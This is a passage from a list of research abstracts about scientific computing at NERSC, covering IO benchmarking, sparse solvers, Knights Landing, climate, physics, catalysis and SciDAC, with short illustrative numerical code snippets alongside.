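    # purely page-cache; slower single-thread performance (e.g. a KNL core
    # vs. a Haswell core) shows up directly in a single-process number
    # like this one.
    block = b"\0" * (block_kb * 1024)
    start = time.perf_counter()
    with open(path, "wb") as f:
        for _ in range(size_mb * 1024 // block_kb):
            f.write(block)
        f.flush()
        os.fsync(f.fileno())
    return size_mb / (time.perf_counter() - start)

with tempfile.TemporaryDirectory() as d:
    bw = write_bandwidth_mb_s(os.path.join(d, "probe.dat"), size_mb=4)
```

Running the same probe on both partitions, with the same file system underneath, isolates the CPU-side contribution to the IO gap.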

  14. LLNL Scientists Use NERSC to Advance Global Aerosol Simulations

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bergmann, D J; Chuang, C; Rotman, D

    2004-10-13

    While "greenhouse gases" have been the focus of climate change research for a number of years, DOE's "Aerosol Initiative" is now examining how aerosols (small particles of approximately micron size) affect the climate on both a global and regional scale. Scientists in the Atmospheric Science Division at Lawrence Livermore National Laboratory (LLNL) are using NERSC's IBM supercomputer and LLNL's IMPACT (atmospheric chemistry) model to perform simulations showing the historic effects of sulfur aerosols at a finer spatial resolution than ever before. Simulations were carried out for five decades, from the 1950s through the 1990s. The results clearly show the effects of the changing global pattern of sulfur emissions. Whereas in 1950 the United States emitted 41 percent of the world's sulfur aerosols, this figure had dropped to 15 percent by 1990, due to conservation and anti-pollution policies. By contrast, the fraction of total sulfur emissions of European origin dropped only by a factor of 2, while the Asian emission fraction jumped sixfold during the same period, from 7 percent in 1950 to 44 percent in 1990. Under a special allocation of computing time provided by the Office of Science INCITE (Innovative and Novel Computational Impact on Theory and Experiment) program, Dan Bergmann, working with a team of LLNL scientists including Cathy Chuang, Philip Cameron-Smith, and Bala Govindasamy, was able to carry out a large number of calculations during the past month, making the aerosol project one of the largest users of NERSC resources. The applications ran on 128 and 256 processors. The objective was to assess the effects of anthropogenic (man-made) sulfate aerosols. The IMPACT model calculates the rate at which SO2 (a gas emitted by industrial activity) is oxidized to form particles known as sulfate aerosols. These particles have a short lifespan in the atmosphere, often washing out in about a week.
    This means that their effects on climate tend to be regional, occurring near the area where the SO2 is emitted. To accurately study these regional effects, Bergmann needed to run the simulations at a finer horizontal resolution, as the coarser resolution (typically 300 km by 300 km) of other climate models is insufficient for studying changes on a regional scale. Livermore's use of CAM3, the Community Atmosphere Model, a high-resolution climate model developed at NCAR (with collaboration from DOE), allows a 100 km by 100 km grid to be applied. NERSC's terascale computing capability provided the computational horsepower needed to run the application at this finer resolution.

  15. Analysis, tuning and comparison of two general sparse solvers for distributed memory computers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Amestoy, P.R.; Duff, I.S.; L'Excellent, J.-Y.

    2000-06-30

    We describe the work performed in the context of a Franco-Berkeley funded project between NERSC-LBNL, located in Berkeley (USA), and CERFACS-ENSEEIHT, located in Toulouse (France). We discuss both the tuning and the performance analysis of two distributed-memory sparse solvers (SuperLU from Berkeley and MUMPS from Toulouse) on the 512-processor Cray T3E at NERSC (Lawrence Berkeley National Laboratory). This project gave us the opportunity to improve the algorithms and add new features to the codes. We then quite extensively analyze and compare the two approaches on a set of large problems from real applications. We further explain the main differences in the behavior of the approaches on artificial regular-grid problems. As a conclusion to this activity report, we mention a set of parallel sparse solvers to which this type of study should be extended.
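SuperLU and MUMPS parallelize sparse LU factorization (supernodal and multifrontal, respectively). The dense kernel both build on is ordinary LU with partial pivoting, sketched here in pure Python with none of the sparsity handling or parallel distribution that distinguishes the two solvers:

```python
def lu_solve(A, b):
    # Gaussian elimination with partial pivoting, followed by back
    # substitution: the dense building block that sparse direct solvers
    # apply to frontal matrices / supernodes. O(n^3); illustration only.
    n = len(A)
    A = [row[:] for row in A]  # work on copies
    b = b[:]
    for k in range(n):
        # Pivot: bring the largest remaining entry in column k to row k.
        p = max(range(k, n), key=lambda i: abs(A[i][k]))
        A[k], A[p] = A[p], A[k]
        b[k], b[p] = b[p], b[k]
        # Eliminate column k below the diagonal.
        for i in range(k + 1, n):
            m = A[i][k] / A[k][k]
            for j in range(k, n):
                A[i][j] -= m * A[k][j]
            b[i] -= m * b[k]
    # Back substitution on the upper-triangular system.
    x = [0.0] * n
    for i in range(n - 1, -1, -1):
        s = sum(A[i][j] * x[j] for j in range(i + 1, n))
        x[i] = (b[i] - s) / A[i][i]
    return x
```

The engineering in SuperLU and MUMPS lies in ordering the unknowns to limit fill-in, grouping columns into dense blocks, and distributing those blocks across processors; the arithmetic per block is the elimination above.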

  16. Evaluating and optimizing the NERSC workload on Knights Landing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Barnes, T; Cook, B; Deslippe, J

    2017-01-30

    NERSC has partnered with 20 representative application teams to evaluate performance on the Xeon-Phi Knights Landing architecture and develop an application-optimization strategy for the greater NERSC workload on the recently installed Cori system. In this article, we present early case studies and summarized results from a subset of the 20 applications highlighting the impact of important architecture differences between the Xeon-Phi and traditional Xeon processors. We summarize the status of the applications and describe the greater optimization strategy that has formed.

  17. Evaluating and Optimizing the NERSC Workload on Knights Landing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Barnes, Taylor; Cook, Brandon; Doerfler, Douglas

    2016-01-01

    NERSC has partnered with 20 representative application teams to evaluate performance on the Xeon-Phi Knights Landing architecture and develop an application-optimization strategy for the greater NERSC workload on the recently installed Cori system. In this article, we present early case studies and summarized results from a subset of the 20 applications highlighting the impact of important architecture differences between the Xeon-Phi and traditional Xeon processors. We summarize the status of the applications and describe the greater optimization strategy that has formed.

  18. Theoretical Comparison Between Candidates for Dark Matter

    NASA Astrophysics Data System (ADS)

    McKeough, James; Hira, Ajit; Valdez, Alexandra

    2017-01-01

    Since the generally accepted view among astrophysicists is that the matter component of the universe is mostly dark matter, the search for dark matter particles continues unabated. The Large Underground Xenon (LUX) improvements, aided by advanced computer simulations at the U.S. Department of Energy's Lawrence Berkeley National Laboratory (Berkeley Lab) National Energy Research Scientific Computing Center (NERSC) and Brown University's Center for Computation and Visualization (CCV), can potentially eliminate some particle models of dark matter. Generally, the proposed candidates fall into three categories: baryonic dark matter, hot dark matter, and cold dark matter. The Lightest Supersymmetric Particle (LSP) of supersymmetric models is a dark matter candidate, classified as a Weakly Interacting Massive Particle (WIMP). Similar to the cosmic microwave background radiation left over from the Big Bang, there is a background of low-energy neutrinos in our Universe. According to some researchers, these may be the explanation for dark matter. One advantage of the neutrino model is that neutrinos are known to exist. Dark matter made from neutrinos is termed "hot dark matter". We formulate a novel empirical function for the average density profile of cosmic voids, identified via the watershed technique in ΛCDM N-body simulations. This function adequately treats both void size and redshift, and describes the scale radius and the central density of voids. We started with a five-parameter model. Our research focuses mainly on the LSP and neutrino models.
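The abstract's five-parameter void profile is not spelled out. A widely used empirical form with five parameters is the Hamaus-Sutter-Wandelt density contrast; the sketch below assumes that form purely for illustration and should not be read as the authors' exact function.

```python
def void_density_contrast(r, delta_c, r_s, r_v, alpha, beta):
    # Hamaus-Sutter-Wandelt-style void profile (assumed form, not the
    # authors'): density contrast delta(r) = rho(r)/rho_mean - 1, with
    #   delta_c : central underdensity (negative inside a void)
    #   r_s     : scale radius where the contrast crosses zero
    #   r_v     : void radius controlling the compensation wall
    #   alpha, beta : inner and outer slopes
    return delta_c * (1.0 - (r / r_s) ** alpha) / (1.0 + (r / r_v) ** beta)
```

By construction the contrast approaches delta_c at the void center and crosses zero at r = r_s; fitting the five parameters as functions of void size and redshift is the kind of calibration the abstract describes.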

  19. Multi-threaded ATLAS simulation on Intel Knights Landing processors

    NASA Astrophysics Data System (ADS)

    Farrell, Steven; Calafiura, Paolo; Leggett, Charles; Tsulaia, Vakhtang; Dotti, Andrea; ATLAS Collaboration

    2017-10-01

    The Knights Landing (KNL) release of the Intel Many Integrated Core (MIC) Xeon Phi line of processors is a potential game changer for HEP computing. With 72 cores and deep vector registers, the KNL cards promise significant performance benefits for highly parallel, compute-heavy applications. Cori, the newest supercomputer at the National Energy Research Scientific Computing Center (NERSC), was delivered to its users in two phases, the first online at the end of 2015 and the second at the end of 2016. Cori Phase 2 is based on the KNL architecture and contains over 9000 compute nodes, each with 96 GB of DDR4 memory. ATLAS simulation with the multithreaded Athena Framework (AthenaMT) is a good potential use-case for the KNL architecture and supercomputers like Cori. ATLAS simulation jobs have a high ratio of CPU computation to disk I/O and have been shown to scale well in multi-threading and across many nodes. In this paper we give an overview of the ATLAS simulation application with details on its multi-threaded design. We then present a performance analysis of the application on KNL devices and compare it to a traditional x86 platform to demonstrate the capabilities of the architecture and evaluate the benefits of utilizing KNL platforms like Cori for ATLAS production.

  20. Development of a fast framing detector for electron microscopy

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Johnson, Ian J.; Bustillo, Karen C.; Ciston, Jim

    2016-10-01

    A high-frame-rate detector system is described that enables fast real-time data analysis of scanning diffraction experiments in scanning transmission electron microscopy (STEM). This is an end-to-end development that encompasses the data-producing detector, data transportation, and real-time processing of data. The detector will consist of a central pixel sensor surrounded by annular silicon diodes. Both components of the detector system will synchronously capture data at almost 100 kHz frame rate, producing an approximately 400 Gb/s data stream. Low-level preprocessing will be implemented in firmware before the data is streamed from the National Center for Electron Microscopy (NCEM) to the National Energy Research Scientific Computing Center (NERSC). Live data processing, before the data lands on disk, will happen on the Cori supercomputer and aims to present scientists with prompt experimental feedback. This online analysis will provide rough information about the sample that can be used for sample alignment, sample monitoring, and verification that the experiment is set up correctly. Only a compressed version of the relevant data is then selected for more in-depth processing.
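Taking the quoted rates at face value, the implied per-frame data volume is a short calculation (this treats "almost 100 kHz" and "approximately 400 Gb/s" as exact round numbers, which they are not):

```python
frame_rate_hz = 100e3        # ~100 kHz synchronized frame rate quoted above
stream_bits_per_s = 400e9    # ~400 Gb/s aggregate data stream quoted above

bits_per_frame = stream_bits_per_s / frame_rate_hz
bytes_per_frame = bits_per_frame / 8
# i.e. about 4 Mbit, or roughly 0.5 MB, per frame -- which is why low-level
# reduction must happen in firmware before the stream leaves the microscope.
```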

  1. First-principles Studies of Ferroelectricity in BiMnO3 Thin Films

    NASA Astrophysics Data System (ADS)

    Wang, Yun-Peng; Cheng, Hai-Ping

    The ferroelectricity of BiMnO3 thin films is a long-standing problem. We employed first-principles density functional theory with inclusion of the local Hubbard Coulomb (U) and exchange (J) terms. The parameters U and J are optimized to reproduce the atomic structure and the energy gap of bulk C2/c BiMnO3. With these optimal U and J parameters, the calculated ferromagnetic Curie temperature and lattice-dynamics properties agree with experiments. We then studied the ferroelectricity of few-layer BiMnO3 thin films on SrTiO3(001) substrates. Our calculations identified ferroelectricity in monolayer, bilayer, and trilayer BiMnO3 thin films. We find that the energy barrier for 90° rotation of the electric polarization is about 3 - 4 times larger than that of conventional ferroelectric materials. This work was supported by the US Department of Energy (DOE), Office of Basic Energy Sciences (BES), under Contract No. DE-FG02-02ER45995. Computations were done using the facilities of the National Energy Research Scientific Computing Center (NERSC).

  2. GYROKINETIC PARTICLE SIMULATION OF TURBULENT TRANSPORT IN BURNING PLASMAS

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Horton, Claude Wendell

    2014-06-10

    The SciDAC project at the IFS advanced the state of high-performance computing for turbulent structures and turbulent transport. The team project with Prof. Zhihong Lin [PI] at the University of California, Irvine produced new understanding of turbulent electron transport. The simulations were performed at the Texas Advanced Computing Center (TACC) and the NERSC facility by Wendell Horton, Lee Leonard, and the IFS graduate students working in that group. The research included a validation of the electron turbulent transport code using data from a steady-state experiment at Columbia University, in which detailed probe measurements of the turbulence in steady state were taken over a wide range of temperature gradients for comparison with the simulation data. These results were published in a joint paper with Texas graduate student Dr. Xiangrong Fu using the work in his PhD dissertation: X.R. Fu, W. Horton, Y. Xiao, Z. Lin, A.K. Sen and V. Sokolov, "Validation of electron temperature gradient turbulence in the Columbia Linear Machine," Phys. Plasmas 19, 032303 (2012).

  3. Shifter: Containers for HPC

    NASA Astrophysics Data System (ADS)

    Gerhardt, Lisa; Bhimji, Wahid; Canon, Shane; Fasel, Markus; Jacobsen, Doug; Mustafa, Mustafa; Porter, Jeff; Tsulaia, Vakho

    2017-10-01

    Bringing HEP computing to HPC can be difficult. Software stacks are often very complicated, with numerous dependencies that are difficult to install on an HPC system. To address this issue, NERSC has created Shifter, a framework that delivers Docker-like functionality to HPC. It works by extracting images from native formats and converting them to a common format that is optimally tuned for the HPC environment. We have used Shifter to deliver the CVMFS software stack for ALICE, ATLAS, and STAR on the supercomputers at NERSC. As well as enabling the distribution of multi-TB CVMFS stacks to HPC, this approach also offers performance advantages. Software startup times are significantly reduced, and load times scale with minimal variation to thousands of nodes. We profile several successful examples of scientists using Shifter to make scientific analysis easily customizable and scalable. We describe the Shifter framework and several efforts in HEP and NP to use Shifter to deliver their software on the Cori HPC system.
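In practice the Shifter workflow has two steps: pull the image once, then request it in the batch job. A config-style sketch modeled on NERSC's documented usage; the image name and script are placeholders, and exact flags may differ between Shifter versions.

```shell
# One-time, on a login node: convert a Docker image into Shifter's
# flattened, HPC-tuned format. (Placeholder image name.)
shifterimg pull docker:myexperiment/analysis:latest

# In the Slurm batch script: request the image at submission time,
# then launch the payload inside the container on every rank.
#SBATCH --image=docker:myexperiment/analysis:latest
#SBATCH --nodes=2
srun shifter ./run_analysis.sh
```

Because the image is flattened ahead of time, thousands of nodes loading the same software stack do not hammer the shared file system with small-file metadata traffic, which is where the startup-time advantage comes from.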

  4. Performance Analysis, Modeling and Scaling of HPC Applications and Tools

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhatele, Abhinav

    2016-01-13

    Efficient use of supercomputers at DOE centers is vital for maximizing system throughput, minimizing energy costs and enabling science breakthroughs faster. This requires complementary efforts along several directions to optimize the performance of scientific simulation codes and the underlying runtimes and software stacks. This in turn requires providing scalable performance analysis tools and modeling techniques that can provide feedback to physicists and computer scientists developing the simulation codes and runtimes respectively. The PAMS project is using time allocations on supercomputers at ALCF, NERSC and OLCF to further the goals described above by performing research along the following fronts: 1. Scaling Study of HPC applications; 2. Evaluation of Programming Models; 3. Hardening of Performance Tools; 4. Performance Modeling of Irregular Codes; and 5. Statistical Analysis of Historical Performance Data. We are a team of computer and computational scientists funded by both DOE/NNSA and DOE/ASCR programs such as ECRP, XStack (Traleika Glacier, PIPER), ExaOSR (ARGO), SDMAV II (MONA) and PSAAP II (XPACC). This allocation will enable us to study big data issues when analyzing performance on leadership computing class systems and to assist the HPC community in making the most effective use of these resources.

  5. Multigrid treatment of implicit continuum diffusion

    NASA Astrophysics Data System (ADS)

    Francisquez, Manaure; Zhu, Ben; Rogers, Barrett

    2017-10-01

    Implicit treatment of diffusive terms of various differential orders common in continuum mechanics modeling, such as computational fluid dynamics, is investigated with spectral and multigrid algorithms in non-periodic 2D domains. In doubly periodic time dependent problems these terms can be efficiently and implicitly handled by spectral methods, but in non-periodic systems solved with distributed memory parallel computing and 2D domain decomposition, this efficiency is lost for large numbers of processors. We built and present here a multigrid algorithm for these types of problems which outperforms a spectral solution that employs the highly optimized FFTW library. This multigrid algorithm is not only suitable for high performance computing but may also be able to efficiently treat implicit diffusion of arbitrary order by introducing auxiliary equations of lower order. We test these solvers for fourth and sixth order diffusion with idealized harmonic test functions as well as a turbulent 2D magnetohydrodynamic simulation. It is also shown that an anisotropic operator without cross-terms can improve model accuracy and speed, and we examine the impact that the various diffusion operators have on the energy, the enstrophy, and the qualitative aspect of a simulation. This work was supported by DOE-SC-0010508. This research used resources of the National Energy Research Scientific Computing Center (NERSC).
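Implicit handling of a diffusive term means solving a linear system every time step. In 1D with second-order diffusion that system is tridiagonal and a direct Thomas solve is enough; multigrid becomes attractive exactly when the operator is multidimensional or of higher (fourth/sixth) order, as in the paper. A minimal backward-Euler sketch with assumed fixed (Dirichlet) boundary values, not the authors' solver:

```python
def implicit_diffusion_step(u, nu, dt, dx):
    # One backward-Euler step for u_t = nu * u_xx:
    #   (I - nu*dt*D2) u_new = u_old
    # The 1D operator is tridiagonal, so the Thomas algorithm solves it
    # directly in O(n). Multigrid replaces this direct solve for 2D/3D
    # domains or higher-order diffusion, where banded elimination no
    # longer scales. Boundary values are held fixed (Dirichlet).
    n = len(u)
    r = nu * dt / dx ** 2
    lo = [-r] * n          # sub-diagonal
    di = [1 + 2 * r] * n   # main diagonal
    up = [-r] * n          # super-diagonal
    di[0] = di[-1] = 1.0   # identity rows pin the two boundary points
    up[0] = 0.0
    lo[-1] = 0.0
    # Thomas algorithm: forward elimination...
    cp = [0.0] * n
    dp = [0.0] * n
    cp[0] = up[0] / di[0]
    dp[0] = u[0] / di[0]
    for i in range(1, n):
        m = di[i] - lo[i] * cp[i - 1]
        cp[i] = up[i] / m
        dp[i] = (u[i] - lo[i] * dp[i - 1]) / m
    # ...then back substitution.
    x = [0.0] * n
    x[-1] = dp[-1]
    for i in range(n - 2, -1, -1):
        x[i] = dp[i] - cp[i] * x[i + 1]
    return x
```

A fourth- or sixth-order diffusion term makes the matrix penta- or heptadiagonal, and in 2D with domain decomposition the band structure is lost entirely; that is the regime where the paper's multigrid approach, or auxiliary lower-order equations, takes over.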

  6. User and Performance Impacts from Franklin Upgrades

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    He, Yun

    2009-05-10

    The NERSC flagship computer, the Cray XT4 system "Franklin", has gone through three major upgrades during the past year: a quad-core upgrade, a CLE 2.1 upgrade, and an IO upgrade. In this paper, we discuss various aspects of the user impact of these upgrades, such as user access, user environment, and user issues. The performance impact on kernel benchmarks and selected application benchmarks is also presented.

  7. Effect of Graphene with Nanopores on Metal Clusters

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Zhou, Hu; Chen, Xianlang; Wang, Lei

    Porous graphene, a novel type of defective graphene, shows excellent potential as a support material for metal clusters. In this work, the stability and electronic structures of metal clusters (Pd, Ir, Rh) supported on pristine graphene and on graphene with nanopores of different sizes were investigated by first-principles density functional theory (DFT) calculations. CO adsorption and the CO oxidation reaction on the Pd-graphene system were then chosen to evaluate its catalytic performance. Graphene with a nanopore can strongly stabilize the metal clusters and cause a substantial downshift of the d-band center of the metal clusters, thus weakening CO adsorption. All binding energies, d-band centers, and adsorption energies change linearly with the size of the nanopore: a bigger nanopore corresponds to a stronger bond between the metal cluster and the graphene, a lower d-band center, and weaker CO adsorption. With a suitably sized nanopore, Pd clusters supported on graphene have similar CO and O2 adsorption abilities, leading to superior CO tolerance. DFT-calculated reaction energy barriers show that graphene with a nanopore is a superior catalyst for the CO oxidation reaction. These properties can play an important role in guiding the preparation of graphene-supported metal catalysts to prevent the diffusion or agglomeration of metal clusters and enhance catalytic performance. This work was supported by the National Basic Research Program of China (973 Program) (2013CB733501) and the National Natural Science Foundation of China (NSFC-21176221, 21136001, 21101137, 21306169, and 91334013). D. Mei acknowledges the support from the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle.
    Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC).
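The d-band center invoked above is the first moment of the d-projected density of states, eps_d = (integral of E*g(E) dE) / (integral of g(E) dE). A minimal numerical sketch using trapezoidal integration over an assumed discretized DOS (not the authors' code):

```python
def d_band_center(energies, dos):
    # First moment of the d-projected density of states g(E), evaluated
    # with the trapezoidal rule on a (possibly non-uniform) energy grid.
    # A downshift of this value away from the Fermi level correlates
    # with weaker adsorbate binding (d-band model).
    num = 0.0  # integral of E * g(E) dE
    den = 0.0  # integral of g(E) dE
    for i in range(len(energies) - 1):
        de = energies[i + 1] - energies[i]
        num += 0.5 * (energies[i] * dos[i] + energies[i + 1] * dos[i + 1]) * de
        den += 0.5 * (dos[i] + dos[i + 1]) * de
    return num / den
```

In a DFT workflow the inputs would be the projected DOS written out by the electronic-structure code; comparing eps_d across nanopore sizes reproduces the linear trend the abstract describes.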

  8. ASCR Cybersecurity for Scientific Computing Integrity - Research Pathways and Ideas Workshop

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Peisert, Sean; Potok, Thomas E.; Jones, Todd

    At the request of the U.S. Department of Energy's (DOE) Office of Science (SC) Advanced Scientific Computing Research (ASCR) program office, a workshop was held June 2-3, 2015, in Gaithersburg, MD, to identify potential long-term (10 to 20+ year) cybersecurity fundamental research and development challenges, strategies, and a roadmap for future high performance computing (HPC), networks, data centers, and extreme-scale scientific user facilities. This workshop was a follow-on to the workshop held January 7-9, 2015, in Rockville, MD, that examined higher-level ideas about scientific computing integrity specific to the mission of the DOE Office of Science. Issues included research computation and simulation that takes place on ASCR computing facilities and networks, as well as network-connected scientific instruments, such as those run by various DOE Office of Science programs. Workshop participants included researchers and operational staff from DOE national laboratories, as well as academic researchers and industry experts. Participants were selected based on the submission of abstracts relating to the topics discussed in the previous workshop report [1] and also from other ASCR reports, including "Abstract Machine Models and Proxy Architectures for Exascale Computing" [27], the DOE "Preliminary Conceptual Design for an Exascale Computing Initiative" [28], and the January 2015 machine learning workshop [29]. The workshop was also attended by several observers from DOE and other government agencies. The workshop was divided into three topic areas: (1) Trustworthy Supercomputing, (2) Extreme-Scale Data, Knowledge, and Analytics for Understanding and Improving Cybersecurity, and (3) Trust within High-end Networking and Data Centers. Participants were divided into three corresponding teams based on the category of their abstracts.
    The workshop began with a series of talks from the program manager and workshop chair, followed by the leaders of each of the three topics and a representative of each of the four major DOE Office of Science Advanced Scientific Computing Research facilities: the Argonne Leadership Computing Facility (ALCF), the Energy Sciences Network (ESnet), the National Energy Research Scientific Computing Center (NERSC), and the Oak Ridge Leadership Computing Facility (OLCF). The rest of the workshop consisted of topical breakout discussions and focused writing periods that produced much of this report.

  9. Opening Comments: SciDAC 2008

    NASA Astrophysics Data System (ADS)

    Strayer, Michael

    2008-07-01

    Welcome to Seattle and the 2008 SciDAC Conference. This conference, the fourth in the series, is a continuation of the PI meetings we first began under SciDAC-1. I would like to start by thanking the organizing committee, and Rick Stevens in particular, for organizing this year's meeting. This morning I would like to look briefly at SciDAC, to give you a brief history of SciDAC and also look ahead to see where we plan to go over the next few years. I think the best description of SciDAC, at least the simulation part, comes from a quote from Dr Ray Orbach, DOE's Under Secretary for Science and Director of the Office of Science. In an interview that appeared in the SciDAC Review magazine, Dr Orbach said, `SciDAC is unique in the world. There isn't any other program like it anywhere else, and it has the remarkable ability to do science by bringing together physical scientists, mathematicians, applied mathematicians, and computer scientists who recognize that computation is not something you do at the end, but rather it needs to be built into the solution of the very problem that one is addressing'. Of course, that is extended not just to physical scientists, but also to biological scientists. This is a theme of computational science, this partnership among disciplines, which goes all the way back to the early 1980s and Ken Wilson. It's a unique thread within the Department of Energy. SciDAC-1, launched around the turn of the millennium, created a new generation of scientific simulation codes. It advocated building out mathematical and computing system software in support of science and a new collaboratory software environment for data. The original concept for SciDAC-1 had topical centers for the execution of the various science codes, but several corrections and adjustments were needed. The ASCR scientific computing infrastructure was also upgraded, providing the hardware facilities for the program. 
The computing facility that we had at that time was the big 3 teraflop/s center at NERSC, and that had to be shared with the programmatic side supporting research across DOE. At the time, ESnet provided just slightly over half a gigabit per second of bandwidth; and the science being addressed was accelerator science, climate, chemistry, fusion, astrophysics, materials science, and QCD. We built out the national collaboratories from the ASCR office, and in addition we built Integrated Software Infrastructure Centers (ISICs). Of these, three were in applied mathematics, four in computer science (including a performance evaluation research center), and four were collaboratories or Grid projects having to do with data management. For science, there were remarkable breakthroughs in simulation, such as full 3D laboratory-scale flame simulation. There were also significant improvements in application codes - from factors of almost 3 to more than 100 - as people began to realize they had to integrate mathematics tools and computer science tools into their codes to take advantage of the parallelism of the day. The SciDAC data-mining tool, Sapphire, received a 2006 R&D 100 award. And the community as a whole worked well together and began building a publication record that was substantial. In 2006, we recompeted the program with similar goals - SciDAC-1 was very successful, and we wanted to continue that success and extend what was happening under SciDAC to the broader science community. We opened up the partnership to all of the Offices of Science and the NSF and the NNSA. The goal was to create comprehensive scientific computing software and the infrastructure for the software to enable scientific discovery in the physical, biological, and environmental sciences and take the simulations to an extreme scale, in this case petascale. We would also build out a new generation of data management tools.
What we observed during SciDAC-1 was that the data and the data communities - both experimental data from large experimental facilities and observational data, along with simulation data - were expanding at a rate significantly faster than Moore's law. In the past few weeks, the FastBit indexing technology software tool for data analyses and data mining developed under SciDAC's Scientific Data Management project was recognized with an R&D 100 Award, selected by an independent judging panel and editors of R&D Magazine as one of the 100 most technologically significant products introduced into the marketplace over the past year. For SciDAC-2 we had nearly 250 proposals requesting a total of slightly over 1 billion in funding. Of course, we had nowhere near 1 billion. The facilities and the science we ended up with were not significantly different from what we had in SciDAC-1. But we had put in place substantially increased facilities for science. When SciDAC-1 was originally executed with the facilities at NERSC, there was significant impact on the resources at NERSC, because not only did we have an expanding portfolio of programmatic science, but we had the SciDAC projects that also needed to run at NERSC. Suddenly, NERSC was incredibly oversubscribed. With SciDAC-2, we had in place leadership-class computing facilities at Argonne with slightly more than half a petaflop and at Oak Ridge with slightly more than a quarter petaflop with an upgrade planned at the end of this year for a petaflop. And we increased the production computing capacity at NERSC to 104 teraflop/s just so that we would not impact the programmatic research and so that we would have a startup facility for SciDAC. At the end of the summer, NERSC will be at 360 teraflop/s. Both the Oak Ridge system and the principal resource at NERSC are Cray systems; Argonne has a different architecture, an IBM Blue Gene/P. 
At the same time, ESnet has been built out, and we are on a path where we will have dual rings around the country, from 10 to 40 gigabits per second - a factor of 20 to 80 over what was available during SciDAC-1. The science areas include accelerator science and simulation, astrophysics, climate modeling and simulation, computational biology, fusion science, high-energy physics, petabyte high-energy/nuclear physics, materials science and chemistry, nuclear physics, QCD, radiation transport, turbulence, and groundwater reactive transport modeling and simulation. They were supported by new enabling technology centers and university-based institutes to develop an educational thread for the SciDAC program. There were four mathematics projects and four computer science projects; and under data management, we see a significant difference in that we are bringing up new visualization projects to support and sustain data-intensive science. When we look at the budgets, we see growth in the budget from just under $60 million for SciDAC-1 to just over $80 million for SciDAC-2. Part of the growth is due to bringing in NSF and NNSA as new partners, and some of the growth is due to some program offices increasing their investment in SciDAC, while other program offices are constant or have decreased their investment. This is not a reflection of their priorities per se but, rather, a reflection of the budget process and the difficult times in Washington during the past two years. New activities are under way in SciDAC - the annual PI meeting has turned into what I would describe as the premier interdisciplinary computational science meeting, one of the best in the world. Doing interdisciplinary meetings is difficult because people tend to develop a focus for their particular subject area. But this is the fourth in the series; and since the first meeting in San Francisco, these conferences have been remarkably successful.
For SciDAC-2 we also created an outreach magazine, SciDAC Review, which highlights scientific discovery as well as high-performance computing. It's been very successful in telling the non-practitioners what SciDAC and computational science are all about. The other new instrument in SciDAC-2 is an outreach center. As we go from computing at the terascale to computing at the petascale, we face the problem of narrowing our research community. The number of people who are `literate' enough to compute at the terascale is more than the number of those who can compute at the petascale. To address this problem, we established the SciDAC Outreach Center to bring people into the fold and educate them as to how we do SciDAC, how the teams are composed, and what it really means to compute at scale. The resources I have mentioned don't come for free. As part of the HECRTF Act of 2004, Congress mandated that the Secretary would ensure that leadership-class facilities would be open to everyone across all agencies. So we took Congress at its word, and INCITE is our instrument for making allocations at the leadership-class facilities at Argonne and Oak Ridge, as well as smaller allocations at NERSC. The selected proposals, therefore, are very large projects that are computationally intensive, that compute at scale, and that have a high science impact. An important feature is that INCITE is completely open to anyone - there is no requirement of DOE Office of Science funding, and proposals are rigorously reviewed for both the science and the computational readiness. In 2008, more than 100 proposals were received, requesting about 600 million processor-hours. We allocated just over a quarter of a billion processor-hours. Astrophysics, materials science, lattice gauge theory, and high energy and nuclear physics were the major areas. These were the teams that were computationally ready for the big machines and that had significant science they could identify.
In 2009, there will be a significant increase in the amount of time to be allocated - over half a billion processor-hours. The deadline is August 11 for new proposals and September 12 for renewals. We anticipate a significant increase in the number of requests this year. We expect you - as successful SciDAC centers, institutes, or partnerships - to compete for and win INCITE program allocation awards. If you have a successful SciDAC proposal, we believe it will make you successful in the INCITE review. We expect that you will be among those most prepared and most ready to use the machines and to compute at scale. Over the past 18 months, we have assembled a team to look across our computational science portfolio and to judge which are the 10 most significant science accomplishments. The ASCR office, as it goes forward with OMB, the new administration, and Congress, will be judged by the science we have accomplished. All of our proposals - such as for increasing SciDAC, increasing applied mathematics, and so on - are tied to what we have accomplished in science. And so these 10 big accomplishments are key to establishing credibility for new budget requests. Tony Mezzacappa, who chaired the committee, will also give a presentation on the ranking of these top 10, how they got there, and what the science is all about. Here is the list - numbers 2, 5, 6, 7, 9, and 10 are all SciDAC projects.
1. Modeling the Molecular Basis of Parkinson's Disease (Tsigelny)
2. Discovery of the Standing Accretion Shock Instability and Pulsar Birth Mechanism in a Core-Collapse Supernova Evolution and Explosion (Blondin)
3. Prediction and Design of Macromolecular Structures and Functions (Baker)
4. Understanding How a Lifted Flame Is Stabilized in a Hot Coflow (Yoo)
5. New Insights from LCF-enabled Advanced Kinetic Simulations of Global Turbulence in Fusion Systems (Tang)
6. High Transition Temperature Superconductivity: A High-Temperature Superconductive State and a Pairing Mechanism in the 2-D Hubbard Model (Scalapino)
7. PETSc: Providing the Solvers for DOE High-Performance Simulations (Smith)
8. Via Lactea II, a Billion-Particle Simulation of the Dark Matter Halo of the Milky Way (Madau)
9. Probing the Properties of Water through Advanced Computing (Galli)
10. First Provably Scalable Maxwell Solver Enables Scalable Electromagnetic Simulations (Kolev)
